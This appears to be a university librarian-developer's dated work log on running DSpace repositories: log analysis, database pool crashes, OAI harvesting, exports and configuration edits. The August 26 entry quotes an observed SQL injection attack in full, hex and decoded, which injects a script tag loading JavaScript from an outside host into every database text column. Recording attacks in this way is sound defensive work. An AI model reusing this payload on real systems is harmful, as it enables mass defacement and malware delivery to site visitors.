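Before the sql lookup can run, the handle has to be pulled out of the apache line. The sketch below shows one way to do that with a regular expression; ApacheDownloadLine is a hypothetical name, and the assumption that the path is /bitstream/handle/sequence/filename is based on the sample log line and the bitstream servlet code.

```java
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Hypothetical helper: extracts handle, sequence number and filename from a download request.
class ApacheDownloadLine {
    private static final Pattern BITSTREAM_REQUEST =
            Pattern.compile("\"GET /bitstream/(\\d+)/(\\d+)/(\\S+) HTTP");

    // Returns {handle, sequence, filename}, or null if the line is not a bitstream download.
    static String[] parse(String line) {
        Matcher m = BITSTREAM_REQUEST.matcher(line);
        if (!m.find()) {
            return null;
        }
        return new String[] { m.group(1), m.group(2), m.group(3) };
    }
}
```

The first element of the result is the handle that goes into the sql command above.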

Views

Comparison of apache and dspace logs

For views we have an apache log of the form:

203.20.101.203 - - [21/Sep/2008:23:32:17 -0500] "GET /handle/22682 HTTP/1.1" 503 410 "http://scholar.google.com.au/scholar?q=%22some+implications+of+the+growth+of+the+mineral+sector%22&hl=en&um=1&ie=UTF-8&oi=scholart" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.1)"

When the request below is put into a browser:
http://ageconsearch.umn.edu/handle/22682

We get the catalina log:

2008-09-30 16:26:30,456 INFO org.dspace.app.webui.servlet.DSpaceServlet @ anonymous:session_id=F82A25EDFCF0C73AE8C19291D3C3985A:ip_addr=128.101.29.84:view_item:handle=22682

Required conversions

To generate the dspace log format, we need to determine what was being viewed. In the case above it was a view_item.
From the handle we can find the resource_type_id, which allows us to generate terms like view_item.
select * from handle where handle=22682;
 handle_id | handle | resource_type_id | resource_id
-----------+--------+------------------+-------------
     13089 |  22682 |                2 |       12346
The table below provides a conversion between the resource_type_id and the actual type.
resource_type resource_type_id
BITSTREAM 0
BUNDLE 1
ITEM 2
COLLECTION 3
COMMUNITY 4
SITE 5
GROUP 6
EPERSON 7
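
The table can be turned into a small lookup that produces the log term directly. This is a sketch under the assumption that the term is always "view_" plus the lower-case type name, which matches view_item, view_collection and view_community in the catalina logs; ResourceTypes is a hypothetical name.

```java
import java.util.Locale;

// Hypothetical helper: maps resource_type_id to its name and to a dspace log term.
class ResourceTypes {
    // Index in the array is the resource_type_id from the table above.
    private static final String[] NAMES = {
        "BITSTREAM", "BUNDLE", "ITEM", "COLLECTION", "COMMUNITY", "SITE", "GROUP", "EPERSON"
    };

    static String nameOf(int resourceTypeId) {
        if (resourceTypeId < 0 || resourceTypeId >= NAMES.length) {
            throw new IllegalArgumentException("unknown resource_type_id: " + resourceTypeId);
        }
        return NAMES[resourceTypeId];
    }

    // Assumption: the log term is "view_" followed by the lower-case type name.
    static String viewAction(int resourceTypeId) {
        return "view_" + nameOf(resourceTypeId).toLowerCase(Locale.ROOT);
    }
}
```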

September 24, 2008

Analysis of Apache/Catalina AgEcon Records for

Breakdown of log entries by type

I looked at the catalina.out log records for 2008-09-21. These logs are in the file: catalina.out_2008-09-21 (because of the way that the files are backed up the log entries only extend to 11:30 PM). From these entries, I made a list of log entries by type: BreakDownOfAgEconLog_2008_09_21.html It is worth noting that of the 62K hits only 20 came from "SimpleSearch". That is only 20 users went to our search engine and the rest searched through google or are robots.

Log types that are required for stats

Jason Roy and I agree that the following log types are needed for stats.
Log Name          Number in Log   Found Apache Match   Apache needs SQL
view_bitstream    10772           Y                    Y
view_item         4462            Y                    N
view_collection   2084            Y                    Y
view_community    582             Y                    Y
The "Apache needs SQL" column indicates whether it is required to use information from the dspace SQL database to map the apache logs to dspace catalina logs. Also the term "view_bitstream" corresponds to download.

How apache logs map to catalina logs

To take care of some issues in the catalina logs, I am going to use apache logs. Here are examples of the log entries for both apache and catalina for all of the critical log types given in the table above. There are also catalina examples for almost all the types.

September 17, 2008

Why UDC crashed ... "pool exhausted" error

Jason,

Basically DSPACE does not properly close connections to the SQL server. When the pool is exhausted it generates error messages. This may be more of a problem now because OAI is available (climbing down the tree will hit the DB a lot) or there is another SQL-Injection attack, or UDC just may be more popular. I did not explore the probable increased load.

A more detailed explanation of the error is given below, with a possible fix. To set up the fix given on the web I need some privileges on strip3. I have asked CCO for them.

Jeff

1) Problem Indicated in the Logs

Starting at
2008-09-17 08:23:08,769
and ending at
2008-09-17 08:53:29,729 (When Bill restarted DSPACE).
There were 330 error messages of the type:
2008-09-17 08:53:29,729 WARN org.dspace.app.webui.servlet.DSpaceServlet @ anonymous:no_context:database_error:org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool exhausted


An error message of this sort would generate an error screen.

2) Fix from University of Michigan

In dspace-tech the University of Michigan team addresses this problem by closing processes that have the phrase 'idle in transaction' when displayed by ps.

see
http://www.mail-archive.com/dspace-tech@lists.sourceforge.net/msg01057.html

3) Confirmation that our problem matches University of Michigan's
I have checked strip3 (where the postgres database lives) and between 08:54 (When Bill restarted DSPACE) and 11:22, there have been 45 processes created that have the form:

postgres 15047 0.0 0.0 86304 4964 ? S 10:58 0:00 postgres: dspace_ir dspace_ir 134.84.135.19 idle

So we are building up these "idle" processes on the DB side and it is likely that the system will crash again, unless we put in the Michigan fix.

September 16, 2008

Properties of tomcat and apache on strip1

Here are the properties:

Using CATALINA_BASE: /opt/tomcat
Using CATALINA_HOME: /opt/tomcat
Using CATALINA_TMPDIR: /opt/tomcat/temp
Using JRE_HOME: /opt/jdk1.5.0_10
Server version: Apache Tomcat/5.5.20
Server built: Sep 12 2006 10:09:20
Server number: 5.5.20.0
OS Name: Linux
OS Version: 2.6.9-78.0.1.ELsmp
Architecture: i386
JVM Version: 1.5.0_10-b03
JVM Vendor: Sun Microsystems Inc.



Server version: Apache/2.0.52
Server built: May 9 2008 05:54:40

mod_jk/1.2.25

September 11, 2008

Bad handle in AgEcon indexer

An AgEcon patron tried to submit a file to the archive. When they did a search based on author an error resulted. The AgEcon staff resubmitted and then deleted the old record. It looks like a bad handle got into the lucene index with the submit and then was never removed. When dspace queries lucene and finds a handle that is not in the DB it throws an error and halts the search. Perhaps it should continue on. Here are some error logs.

September 8, 2008

OAI on odin

Activating the OAI harvester

I have enabled the OAI harvester for the dspace instance on the odin box. I needed to make the oai_dc metadata available. To do this I copied the file:

~/dspace_home/config/templates/oaicat.properties
to
~/dspace_home/config/templates/oaicat.properties

and returned the contents of this file to its original form (i.e. revision 1). Note: in this default state the file oaicat.properties has the line:
Crosswalks.oai_dc=org.dspace.app.oai.OAIDCCrosswalk uncommented.
I also removed the replace task from the build.xml file in the dspace-sr instance. Although the OAI harvester has been operational for several months, the changes mean that the dspace-ir (UDC) and the dspace-sr (AgEcon) now invoke the OAI system in an identical fashion.

Hyperlinks to call OAI verbs

Hyperlinks to development server on odin

The URL below returned all the metadata:
https://odin.lib.umn.edu:9031/dspace-oai-ir/request?verb=ListRecords&metadataPrefix=oai_dc

This URL will return all the metadata since 2008-04-15:
https://odin.lib.umn.edu:9031/dspace-oai-ir/request?verb=ListRecords&metadataPrefix=oai_dc&from=2008-04-15

The next URL returns the data between 2008-04-15 and 2008-04-20
https://odin.lib.umn.edu:9031/dspace-oai-ir/request?verb=ListRecords&metadataPrefix=oai_dc&from=2008-04-15&until=2008-04-20

Hyperlinks to live box

AgEcon:
http://strip1.oit.umn.edu:8080/dspace_sr-oai/request?verb=ListRecords&metadataPrefix=oai_dc&from=2008-04-15&until=2008-04-30
UDC:
http://strip1.oit.umn.edu:8080/dspace_ir-oai/request?verb=ListRecords&metadataPrefix=oai_dc&from=2008-04-15&until=2008-04-30

Nice hyperlinks to live box

http://strip1.oit.umn.edu:8080/dspace_ir-oai/
has been aliased to
http://conservancy.umn.edu/oai

and
http://strip1.oit.umn.edu:8080/dspace_sr-oai/
has been aliased to
http://ageconsearch.umn.edu/oai/

These are much nicer to look at.

So the urls below will work.
http://conservancy.umn.edu/oai/request?verb=ListRecords&metadataPrefix=oai_dc&from=2008-04-15&until=2008-04-30
http://ageconsearch.umn.edu/oai/request?verb=ListRecords&metadataPrefix=oai_dc&from=2008-04-15&until=2008-04-30

Issues with OAI harvester on DSPACE

Elements in the AgEcon schema are not displayed

Only the AgEcon metadata that are Dublin Core are displayed by the OAI harvester
Note in the table from the link above:  
metadata_schema_id = 1 is dc schema
metadata_schema_id = 2 is agecon schema

The elements of the AgEcon schema are not displayed by the current crosswalk and a new crosswalk would have to be written.

Crosswalk is not qualified Dublin Core

The crosswalk from the dspace archive to the OAI output is Dublin Core not qualified Dublin Core (note the metadataPrefix=oai_dc in the OAI requests above).
So the values:
 date        | accessioned | Date DSpace takes possession of item.
 date        | available        | Date or date range item became available to the public.
 date        | issued    
  
are all mapped to the tag <dc:date>. In this OAI output sample, I have pointed out which OAI <dc:date> tags correspond to the various qualified Dublin Core dates. I did an sql query on item 2 to find the actual values for the different date fields.
I could try to find a canned crosswalk from DSPACE to qualified DC. I have briefly looked for one. Several people say it would be a good thing, but I have not found anyone who has done it. It is hard to say how long this would take, and it is possible that no one has done it.

Update oaicat.jar

I did an update on oaicat.jar. It turns out that both versions of the jar work, so I stayed with the more recent version. The manifests from both jars are given here.
oaiCatMainfest.html

August 26, 2008

SQL injection attacks on dspace

We have been getting a large number of SQL injection attacks. Below is the raw hex of these attacks and the ascii translations.
Raw hex: www.lib.umn.edu/libdata/page_print.phtml?page_id=1337'; DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x 4445434C415245204054207661726368617228323535292C4043207661 7263686172283430303029204445434C415245205461626C655F437572 736F7220435552534F5220464F522073656C65637420612E6E616D652C 622E6E616D652066726F6D207379736F626A6563747320612C73797363 6F6C756D6E73206220776865726520612E69643D622E696420616E6420 612E78747970653D27752720616E642028622E78747970653D3939206F 7220622E78747970653D3335206F7220622E78747970653D323331206F 7220622E78747970653D31363729204F50454E205461626C655F437572 736F72204645544348204E4558542046524F4D20205461626C655F4375 72736F7220494E544F2040542C4043205748494C452840404645544348 5F5354415455533D302920424547494E20657865632827757064617465 205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B 275D2B2727223E3C2F7469746C653E3C736372697074207372633D2268 7474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A 73223E3C2F7363726970743E3C212D2D272720776865726520272B4043 2B27206E6F! ASCII DECLARE @T varchar(255),@C va?rchar(4000) DECLARE Table_Cur?sor CURSOR FOR select a.name,?b.name from sysobjects a, sysc?olumns b where a.id=b.id and ?a.xtype='u' and (b.xtype=99 o?r b.xtype=35 or b.xtype=231 o?r b.xtype=167) OPEN Table_Cur?sor FETCH NEXT FROM Table_Cu?rsor INTO @T,@C WHILE(@@FETCH?_STATUS=0) BEGIN exec('update? ['+@T+'] set ['+@C+']=['+@C+?']+''"></title><script src= "h?ttp://sdo.1000mg.cn/csrss/w.j?s"></script><!--'' where '+@C?+' no
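
The hex to ascii translation above can be reproduced with a few lines of Java. This is a minimal sketch, assuming the payload is plain single-byte text: HexPayload is a hypothetical name, anything that is not a hex digit (such as the spaces in the dump) is ignored, and a dangling half byte at the end of a truncated dump is dropped.

```java
// Hypothetical helper: decodes the hex argument of CAST(0x...) into readable text.
class HexPayload {
    static String decode(String hex) {
        // Drop spaces, line breaks and any other non-hex characters from the dump.
        String digits = hex.replaceAll("[^0-9A-Fa-f]", "");
        StringBuilder out = new StringBuilder();
        // Two hex digits make one character; an odd trailing digit is ignored.
        for (int i = 0; i + 1 < digits.length(); i += 2) {
            out.append((char) Integer.parseInt(digits.substring(i, i + 2), 16));
        }
        return out.toString();
    }
}
```

For example, HexPayload.decode("4445434C415245") returns DECLARE, the first word of the payload.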

August 25, 2008

Small changes to UDC

I. Change a simple phrase

OLD: ./config/language-packs/Messages.properties:112:jsp.collection-home.submit.button =
OLD: Submit to This Collection
NEW:Submit another item

II. kill "Subscribe to this collection to receive daily e-mail notification of new additions" button

The file ./jsp/local/collection-home.jsp was edited to remove the button.
edits to collection-home.jsp

August 21, 2008

Exporting DSPACE repository to flat files

Exporting DSPACE repository to flat files
Export collection with handle: 33784
Export to the directory: /dspace/assetstore/ag_export/im/
Export to start at lowest member of collection : n=0

./dsrun org.dspace.app.itemexport.ItemExport -t COLLECTION -i 33784
-d /dspace/assetstore/ag_export/im/ -n 0

Subdirectories created
[silvi003@strip1 im]$ ls
0 13 18 22 27 31 36 40 45 5 54 59 63 68 72 77 81 86 90
1 14 19 23 28 32 37 41 46 50 55 6 64 69 73 78 82 87 91
10 15 2 24 29 33 38 42 47 51 56 60 65 7 74 79 83 88 92
11 16 20 25 3 34 39 43 48 52 57 61 66 70 75 8 84 89 93
12 17 21 26 30 35 4 44 49 53 58 62 67 71 76 80 85 9

Contents of the first subdirectory
[silvi003@strip1 im]$ ls 0
contents dublin_core.xml fo07he01.pdf handle

The Dublin Core in the first subdirectory

[silvi003@strip1 im]$ cat 0/dublin_core.xml
0/dublin_core.xml
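
A quick way to check that every exported item directory has the same bookkeeping files as directory 0 is sketched below. It assumes, based only on the listing above, that each item should contain contents, dublin_core.xml and handle; the function name is made up for illustration.

```python
from pathlib import Path

# Files seen in the first item directory above (besides the bitstream itself).
EXPECTED = {"contents", "dublin_core.xml", "handle"}


def incomplete_items(export_dir: str) -> dict[str, set[str]]:
    """Map each item subdirectory name to the expected files it is missing."""
    problems = {}
    for item_dir in sorted(Path(export_dir).iterdir()):
        if not item_dir.is_dir():
            continue
        present = {p.name for p in item_dir.iterdir()}
        missing = EXPECTED - present
        if missing:
            problems[item_dir.name] = missing
    return problems
```

Calling incomplete_items("/dspace/assetstore/ag_export/im/") would return an empty dict when every item directory is complete.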

July 28, 2008

Sending dspace email to a gmail account

email situation

Dspace sends me a large number of email messages. My real email gets lost in a forest of dspace messages. So I need to find every instance where silvi003@umn.edu is used and replace it with an account that I set up: dspacedump@gmail.com
So I changed:

mail.admin = silvi003@umn.edu
alert.recipient = silvi003@umn.edu

to

mail.admin = dspacedump@gmail.com
alert.recipient = dspacedump@gmail.com

in
./config/dspace.cfg
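
To find any remaining places where the old address is used, a small search over the config tree is enough. The sketch below is only an illustration: the function name and the default *.cfg pattern are assumptions, and other file types (jsp, properties) would need their own pattern.

```python
from pathlib import Path


def find_address(root: str, address: str, pattern: str = "*.cfg"):
    """Yield (path, line number, line) for every line containing address."""
    for path in sorted(Path(root).rglob(pattern)):
        text = path.read_text(encoding="utf-8", errors="replace")
        for number, line in enumerate(text.splitlines(), start=1):
            if address in line:
                yield str(path), number, line.strip()
```

For example, list(find_address("./config", "silvi003@umn.edu")) should come back empty once the change above is complete.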

July 17, 2008

media filter UDC and cron job

Cron job

My predecessor wrote a cron job to index the contents of the pdfs in UDC. It is:
#
# Filter media
#
1 0 * * * /dspace/dspace-ir/bin/filter-media.sh > /dspace/dspace-ir/log/filter-media.log 2>&1
It was noted that this process was taking up to eight hours to run and impacting the users.
It will need to be edited and replaced.

Error record associated with the cron job

Creating search index:
Applying Media Filters
2008-02-11 08:07:19,271 
  INFO  org.dspace.core.ConfigurationManager @ DSpace logging installed using log4j.properties
Exception in thread "main" java.lang.IllegalArgumentException: Cannot resolve 4938 to a DSpace object
        at org.dspace.app.mediafilter.MediaFilterManager.main(MediaFilterManager.java:192)
Applying Media Filters
2008-02-11 08:07:19,839 INFO  org.dspace.core.ConfigurationManager 
       @ DSpace logging installed using log4j.properties
2008-02-11 08:07:20,160 INFO  org.dspace.content.MetadataField 
       @ Loading MetadataField elements into cache.
2008-02-11 08:07:20,199 INFO  org.dspace.content.MetadataSchema @ Loading schema cache for fast finds
SKIPPED: bitstream 16263 because 'LIFE_SCIENCEs_PREDESIGN_REPORT041504_.pdf.txt' already exists
SKIPPED: bitstream 16261 because 'equine_predesign_may04.pdf.txt' already exists
SKIPPED: bitstream 16259 because 'EducationalFacilitiesPredesignStudyFinal.pdf.txt' already exists
ERROR filtering, skipping bitstream #16251 java.lang.ArrayIndexOutOfBoundsException: 4
java.lang.ArrayIndexOutOfBoundsException: 4
        at org.fontbox.cmap.CMapParser.parseNextToken(CMapParser.java:294)
        at org.fontbox.cmap.CMapParser.parse(CMapParser.java:103)
        at org.pdfbox.pdmodel.font.PDFont.parseCmap(PDFont.java:535)
        at org.pdfbox.pdmodel.font.PDFont.encode(PDFont.java:387)
        at org.pdfbox.util.PDFStreamEngine.showString(PDFStreamEngine.java:325)
        at org.pdfbox.util.operator.ShowTextGlyph.process(ShowTextGlyph.java:80)
        at org.pdfbox.util.PDFStreamEngine.processOperator(PDFStreamEngine.java:452)
        at org.pdfbox.util.PDFStreamEngine.processSubStream(PDFStreamEngine.java:215)
        at org.pdfbox.util.PDFStreamEngine.processStream(PDFStreamEngine.java:174)
        at org.pdfbox.util.PDFTextStripper.processPage(PDFTextStripper.java:336)
        at org.pdfbox.util.PDFTextStripper.processPages(PDFTextStripper.java:259)
        at org.pdfbox.util.PDFTextStripper.writeText(PDFTextStripper.java:216)
        at org.pdfbox.util.PDFTextStripper.getText(PDFTextStripper.java:149)
        at org.dspace.app.mediafilter.PDFFilter.getDestinationStream(PDFFilter.java:110)
        at org.dspace.app.mediafilter.MediaFilter.processBitstream(MediaFilter.java:155)
        at org.dspace.app.mediafilter.MediaFilterManager.filterBitstream(MediaFilterManager.java:327)
        at org.dspace.app.mediafilter.MediaFilterManager.filterItem(MediaFilterManager.java:296)
        at org.dspace.app.mediafilter.MediaFilterManager.applyFiltersItem(MediaFilterManager.java:266)
        at org.dspace.app.mediafilter.MediaFilterManager.applyFiltersCollection(MediaFilterManager.java:260)
        at org.dspace.app.mediafilter.MediaFilterManager.main(MediaFilterManager.java:202)
ERROR filtering, skipping bitstream #16250 java.lang.ArrayIndexOutOfBoundsException
java.lang.ArrayIndexOutOfBoundsException
SKIPPED: bitstream 16249 because 'Volume_II-Appendix2.pdf.txt' already exists
ERROR filtering, skipping bitstream #16248 java.lang.ArrayIndexOutOfBoundsException
java.lang.ArrayIndexOutOfBoundsException
SKIPPED: bitstream 15486 because 'AHC_FacilitiesMasterPlan.pdf.txt' already exists
SKIPPED: bitstream 13492 because 'Vet_med_facilities_development_plan_FINAL.pdf.txt' already exists
SKIPPED: bitstream 13490 because 'SPH_CONSOLIDATION.pdf.txt' already exists
SKIPPED: bitstream 13488 because 'AHC_strategic_facility_plan_1998.pdf.txt' already exists
SKIPPED: bitstream 13486 because 'AHC_Precinct_Plan_Report_Final_May_2006.pdf.txt' already exists
SKIPPED: bitstream 13484 because 'AHC_Mpls_District_Plan_2000.pdf.txt' already exists
Creating search index:
Creating browse index
Indexing all Items in DSpace....2008-02-11 08:17:24,358 
  INFO  org.dspace.core.ConfigurationManager @ DSpace logging installed using log4j.properties
2008-02-11 08:17:25,315 
   INFO  org.dspace.content.MetadataField @ Loading MetadataField elements into cache.
2008-02-11 08:17:25,357 
   INFO  org.dspace.content.MetadataSchema @ Loading schema cache for fast finds
 ... Done
Creating search index
2008-02-11 08:19:57,683 INFO  org.dspace.core.ConfigurationManager @ 
   DSpace logging installed using log4j.properties
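
A log like the one above is easier to read once it is reduced to which bitstreams were skipped and which failed. The sketch below assumes the two line formats seen in this log ("SKIPPED: bitstream N because ..." and "ERROR filtering, skipping bitstream #N exception"); the function name is made up for illustration.

```python
import re

SKIPPED = re.compile(r"^SKIPPED: bitstream (\d+) because")
ERROR = re.compile(r"^ERROR filtering, skipping bitstream #(\d+) (\S+)")


def summarize(log_lines):
    """Return (skipped bitstream ids, {failed bitstream id: exception class})."""
    skipped, failed = [], {}
    for line in log_lines:
        if m := SKIPPED.match(line):
            skipped.append(int(m.group(1)))
        elif m := ERROR.match(line):
            # Drop a trailing ":" as in "ArrayIndexOutOfBoundsException: 4".
            failed[int(m.group(1))] = m.group(2).rstrip(":")
    return skipped, failed
```

Run over /dspace/dspace-ir/log/filter-media.log, the failed dict gives the list of bitstreams whose PDFs need a closer look.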

Some basic information on Dspace

Possible ant tasks

ant compile
ant build_wars
ant update
ant install_code
ant init_configs
ant setup_database
ant clean_database
ant load_registries
ant fresh_install
ant clean
ant public_api
ant javadoc

Some important boxes

UDC sandbox
http://odin.lib.umn.edu:9040/dspace-ir/

We set up a virtual machine for strip one and two.
strip1vm.oit.umn.edu 160.94.138.139
strip3vm.oit.umn.edu 160.94.138.140

Miscellaneous

Version that we use: DSpace Version 1.4.1, 8-December-2006
Approximate size of the asset store: 73G
Server version: Apache/2.0.52
On strip1, the Library specific apache configs are kept in /opt/httpd/conf.d

June 20, 2008

Host Based Access on Postgres and DSPACE ... pg_hba.conf

The pg_hba.conf file controls remote access to postgres.
On strip 3 of our DSPACE instance there are two of these files:

/opt/pgsql/data/pg_hba.conf
/var/lib/pgsql/data/pg_hba.conf


/var/lib/pgsql/data/pg_hba.conf is the live one.

June 18, 2008

SQL select to get author, handle, date_issued and title from the postgres DB

select itemsbytitle.title, handle.handle, itemsbydate.date_issued, itemsbyauthor.author
from (( itemsbytitle
INNER JOIN handle ON itemsbytitle.item_id = handle.resource_id)
INNER JOIN itemsbydate ON itemsbydate.item_id = itemsbytitle.item_id)
INNER JOIN itemsbyauthor ON itemsbyauthor.item_id = itemsbytitle.item_id
where handle.resource_id = 8137;
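
The shape of the result is worth noting: the join returns one row per author, so an item with two authors comes back twice. The sketch below shows this with an in-memory SQLite database instead of postgres. The tables carry only the columns the query uses, and the rows are made-up sample data, not values from our DB.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE itemsbytitle  (item_id INTEGER, title TEXT);
    CREATE TABLE handle        (resource_id INTEGER, handle TEXT);
    CREATE TABLE itemsbydate   (item_id INTEGER, date_issued TEXT);
    CREATE TABLE itemsbyauthor (item_id INTEGER, author TEXT);
    -- Made-up sample rows, for illustration only.
    INSERT INTO itemsbytitle  VALUES (8137, 'Sample title');
    INSERT INTO handle        VALUES (8137, '00000');
    INSERT INTO itemsbydate   VALUES (8137, '2008-01-01');
    INSERT INTO itemsbyauthor VALUES (8137, 'Author, First');
    INSERT INTO itemsbyauthor VALUES (8137, 'Author, Second');
""")

QUERY = """
    SELECT t.title, h.handle, d.date_issued, a.author
    FROM itemsbytitle t
    JOIN handle h        ON t.item_id = h.resource_id
    JOIN itemsbydate d   ON d.item_id = t.item_id
    JOIN itemsbyauthor a ON a.item_id = t.item_id
    WHERE h.resource_id = ?
    ORDER BY a.author
"""


def item_rows(connection, item_id):
    """Return (title, handle, date_issued, author) rows for one item."""
    return connection.execute(QUERY, (item_id,)).fetchall()


rows = item_rows(conn, 8137)
for row in rows:
    print(row)
```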

June 12, 2008

Information on Journal in AgEcon from Brad Teale

Hi Jeff,

The Journal listing is created in the Community.java class under org/dspace/content. It is using the following SQL statement:

SELECT DISTINCT(community.community_id), name, short_description, introductory_text,
       logo_bitstream_id, copyright_text, side_bar_text
FROM community, community2item
WHERE community2item.item_id IN
      (SELECT item_id FROM metadatavalue
       WHERE metadata_field_id=
             (SELECT metadata_field_id FROM metadatafieldregistry
              WHERE element='type' AND qualifier IS NULL)
       AND text_value IN ('Journal Article', 'Submitted Journal Article'))
AND community.community_id=community2item.community_id
ORDER BY (name) ASC;

Basically, it is looking in the metadatafieldregistry table for element=type and an empty qualifier with a text_value of either: Journal Article or Submitted Journal Article. These were the terms defined during the initial requirements gathering of these pages. If something else is defined as a Journal type it does require a code change. It would be nice to move these text_value values into the configuration so changes don't require code modifications.

Let me know if you have additional questions.

Brad
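
Brad's suggestion of moving the text_value list into the configuration could look roughly like the sketch below. It is written in Python only to show the idea (the real change would be in Community.java), and it assumes a hypothetical comma-separated config value such as "Journal Article, Submitted Journal Article". The "?" placeholders follow the usual prepared-statement style.

```python
def journal_types_clause(type_values: str):
    """Build a parameterized IN (...) fragment and its parameter list."""
    values = [v.strip() for v in type_values.split(",") if v.strip()]
    if not values:
        raise ValueError("at least one journal type is required")
    placeholders = ", ".join("?" for _ in values)
    return f"text_value IN ({placeholders})", values


clause, params = journal_types_clause("Journal Article, Submitted Journal Article")
print(clause)
print(params)
```

Binding the values as parameters instead of pasting them into the SQL string also keeps a stray quote in the config from breaking the query.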

May 28, 2008

AgEcon MetaData

Below is a list of all the metadata used by AgEcon. Note
metadata_schema_id = 1 refers to dc,
metadata_schema_id = 2 refers to agecon.
AgEconMetadata.html

May 23, 2008

AgEcon OAI URL

Naming OAI handler

I have enabled OAI on AgEcon Search. It can be reached at the URL:
http://strip1.oit.umn.edu:8080/dspace_sr-oai/request?verb=Identify


John Chapman gave me a list of common OAI sites:

http://gita.grainger.uiuc.edu/registry/ListAllRepos.asp


Of the URLs there I like the one below the best:

XML/XSD/XSL Registry (xmlregistry.oclc.org)
http://alcme.oclc.org/xmlregistry/OAIHandler?verb=Identify

It does not have an explicit IP or refer to a specific technology, so it would be easy to maintain as AgEcon migrates from box to box and from one technology to the next.

So based on that I plan on using:
http://ageconsearch.umn.edu/OAIHandler?verb=Identify
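
Because the base URL carries no host-specific detail, every OAI-PMH request is just the base URL plus a verb and its arguments. A minimal sketch of building such URLs follows; the helper name is made up, while Identify, ListRecords and metadataPrefix are standard OAI-PMH 2.0 names.

```python
from urllib.parse import urlencode


def oai_request_url(base_url: str, verb: str, **arguments: str) -> str:
    """Build an OAI-PMH request URL from a base URL, a verb and its arguments."""
    query = urlencode({"verb": verb, **arguments})
    return f"{base_url}?{query}"


BASE = "http://ageconsearch.umn.edu/OAIHandler"
print(oai_request_url(BASE, "Identify"))
print(oai_request_url(BASE, "ListRecords", metadataPrefix="oai_dc"))
```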

Changes in config files

The changes below were required for OAI to come to life:

File: ./config/dspace.cfg
config.template.oaicat.properties = ${dspace.dir}/config/oaicat.properties ... old
config.template.oaicat.properties = ${dspace.dir}/config/templates/oaicat.properties ... new

File: ./build.xml
./build.xml:281: <replace file="${dspace.dir}/config/templates/oaicat.properties"
./build.xml:285: <replace file="${dspace.dir}/config/templates/oaicat.properties"

File: ./etc/oai-web.xml
./etc/oai-web.xml:66: @@dspace.dir@@/config/templates/oaicat.properties

Test OAI handler

http://odin.lib.umn.edu:9030/dspace-oai/request

OAI jar information

[silvi003~/Documents/workspace/dspace-sr/lib]$ dumpManifest oaicat.jar
Manifest-Version: 1.0
Ant-Version: Apache Ant 1.6.1
Created-By: 1.4.1_01-b01 (Sun Microsystems Inc.)
Specification-Title: OAI-PMH
Specification-Version: 2.0
Specification-Vendor: Open Archives Initiative
Implementation-Title: OAICat
Implementation-Version: 1.5.48 October 23 2006
Implementation-Vendor: OCLC, Online Computer Library Center
Implementation-URL: http://www.oclc.org/research/software/oai/cat.shtm

To get the jar go to: OCLC software

Info on OAI tools

OAIToolsFinal.pdf

April 22, 2008

Simple jsp form in dspace and jsp to read it

Jen made the jsp form below:

new-user_direct-email.jsp
I wrote the jsp below to catch the result:

mail_request_for_new_user.jsp
This is a simple chunk of code but I may reuse it.

March 27, 2008

odin ssl certificates

There have been some problems with the viewing of certain images in both UDC and AgEcon from odin.lib.umn.edu. We believe this was due to certificates that I made using the java tool. I replaced my certificate with one made by Brad.

March 12, 2008

Comment out UDC email updates

There is a link called "get email updates" that should allow a user to subscribe to information about new submits. It is broken and for now has been commented out. Below are the commented out lines:

[silvi003~/Documents/workspace/dspace-ir]$ xff -B 2 -A 2 'get.email.updates'
./jsp/local/layout/navbar-default.jsp-232-<!--
./jsp/local/layout/navbar-default.jsp-233- <td nowrap="nowrap" class="navigationBarItem">
./jsp/local/layout/navbar-default.jsp:234: <a class="navigationBarItem" href="<%= request.getContextPath() %>/subscribe">get email updates</a>
./jsp/local/layout/navbar-default.jsp-235- </td>
./jsp/local/layout/navbar-default.jsp-236- </tr>
--
./jsp/local/layout/navbar-home.jsp-152- <!--
./jsp/local/layout/navbar-home.jsp-153- <td nowrap="nowrap" class="navigationBarItem">
./jsp/local/layout/navbar-home.jsp:154: <a class="navigationBarItem" href="<%= request.getContextPath() %>/subscribe">get email updates</a>
./jsp/local/layout/navbar-home.jsp-155- </td>
./jsp/local/layout/navbar-home.jsp-156- -->

March 3, 2008

Changing the display mode for AgEcon

Two files had to be changed to make a few new fields visible in the standard output.

Changes to dspace.cfg

The following section of dspace.cfg was modified.

Changes to ItemTag.java

ItemTag.java had to be modified to properly read the new dspace.cfg.

Future changes

If fields need to be changed in the future only dspace.cfg will have to change.

DB commands for Dspace

See if an item id is in the DB.

February 22, 2008

Process to do an itemexport for a collection in dspace

There is a way to extract the items in a collection from dspace so that they take the form of plain pdf and flat xml files. These directories can be batch ingested back into dspace or another repository.

Finding a collection's ID

The file below shows how to find a collection's ID in dspace. getCollectionID

Brad Teale's filter-media.sh script

The filter-media.sh script will find all the handles of all the collections.

Execute the command to extract the data

[silvi003 /dspace/dspace-ir/bin]$ ./dsrun org.dspace.app.itemexport.ItemExport -t COLLECTION -i 29 -d /dspace/assetstore/udc_export/ima/ -n 0

Resulting Directory Structure

Resulting directories from ItemExport command.

February 15, 2008

Check that abort page for license contains no logic for AgEcon

We have moved the license page from the last page of the submit to the first. The wording of the page says that the entry will be saved, but of course there is no entry. The wording can be easily changed, but I needed to check that the jsp was not executing any code (i.e. trying to write to a file or the DB). It is not, so all is well.

January 25, 2008

Hardwire jsp initial questions

The initial questions checkbox on submit workflow needed to be hardwired. So I made all the buttons hidden and used javascript to automatically submit the form. This is a quick and dirty way to hardwire the values in a jsp form.
Original initial-questions.jsp

Hardwired version

Plan to add email field to name type in dspace submit

Currently the name type that is used to generate forms in dspace has two text fields (first and last name). We need a third field for email and below are the steps that must be taken to create this field.

Steps:

1) Copy edit-metadata.jsp to local -> confirm that new jsp is "live"

2) Confirm edu.umn.dspace.submit.step.DescribeStep is alive

3) Make "email_name" type from "name" type ... do not modify any code in "email_name" yet

4) Drop DCPersonName in "email_name" replace with string

5) Add three text fields to "email_name" in edit-metadata.jsp

6) Fix string in "email_name" code in edu.umn.dspace.submit.step.DescribeStep to handle 3rd field

January 11, 2008

Remove upload messages from AgEcon page

